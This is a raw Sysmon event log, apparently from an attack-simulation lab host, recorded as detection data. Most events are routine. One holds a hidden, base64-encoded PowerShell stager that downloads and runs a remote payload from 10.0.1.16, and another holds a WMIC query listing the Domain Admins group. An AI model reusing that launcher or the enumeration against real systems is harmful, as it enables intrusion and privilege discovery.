21:59:30.324{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.324{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.324{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.324{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.324{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.330{B81B27B7-83C2-613A-E296-03000000C801}624C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /ValueC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035128660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:30.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80B88DC83674C0D28999EF292B2D5E82,SHA256=452549BD929E89909A6CF4AED8D991607E74470A3AE16D5131DC9C62797C058B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:56.492{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62189-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:31.449{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0B7B893FD2D4320871541970899F95F0,SHA256=FF954A2A18336AD22F135A7EEFCED8A3B7E69D430785794D76E27E2000C36CDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:31.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF5498A98393EBA0A2FE2D6F38538A6F,SHA256=A355AF8BBA49992CBAB0D788590918F00A7F7406A5D87A16C1C5EBAE68859A31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:31.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FD6D950F41413AD679B11C85013BF80,SHA256=A6B0AB2413654C9AC8D7FE49B5D3A7BFFB8FBBB6F6399E49294F2660F220FBCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:32.778{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7250e71f.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:56.864{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62191-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:56.575{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local62190-false10.0.1.14WIN-DC-128389ldap 23542300x800000000000000035128678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:32.079{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAF88726B5B923AEE04175D675C5452C,SHA256=93658505C830C312454A1F1B037702C2DE9997BC84EDD2DB8EDAF5BD647CDD31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:33.231{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECC6E1D101D0CD6C10F4BB65BD216B5,SHA256=CC8B316A2E70435B867D5C2B379E70E8E16BB1DA21A2BBBF7AD3A84B58C017BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:34.262{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678996A7E1000186CB22A795B1C02C1D,SHA256=A67F93501AC3D2359B583FEC132452D79D47FD9475D614CFD2397C5917B50666,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:59.198{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62192-false10.0.1.12-8000- 23542300x800000000000000035128684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:35.298{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E889489A22BB495ADBFB1CBB5B26B23C,SHA256=00386B50BA582B4A17A7DB3424D9673618F92EEC9F35700D28F1C35BA8254785,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:36.345{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC51149FADED4D883758A885D78C85EC,SHA256=5017F5CA9B928940DCC7E79EE4DAEC953C4F6D92DEF888DCFE632501A1B61671,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:37.995{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=060D7B53D34589826214F60A4856BB91,SHA256=C93A4D7D41B28B22A095ADD6A6A8873AE0ABD5C877E28E2F1FE156A3DE80C164,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:37.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EA80B20F2D44E4F82D5E595DFDDD8BE1,SHA256=7299CD9DCF6E6861B5FC90DB074EE3628EF22FC728F514A674E4321D3F0CE4FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:37.375{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7903D472B68E2F05DCD2B7A679E4844A,SHA256=6A097744A78EAFD71B143E3A2BD5CA0B3F0D312D3F5D211A5C7EDFFE98A8C54D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:02.880{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62193-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:38.611{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:38.611{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=7CEF0B27A6E80786366E15F3295026AD,SHA256=241B45557E5AEFA96DA8D32DA701F4172EEEF4AD5B77377251784D19A221C275,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:38.392{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F49E664778D5E9611B834BC5434BC41,SHA256=D285DF6DA04C6E30EA3797565BB6CAD1FD4DA2DF47C2D5465F295D286F833C32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:04.294{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62194-false10.0.1.12-8000- 23542300x800000000000000035128694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:39.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A10DA4FF67C081E192331B374DA41F,SHA256=3CC71CEA169573F9E7DD30D7C4EF26FEAD036BE6B1BF7E3BD61C2D1B30D9FB81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.540{B81B27B7-83CC-613A-E396-03000000C801}33241584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}7925480C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-A300-00000000C801}1336C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 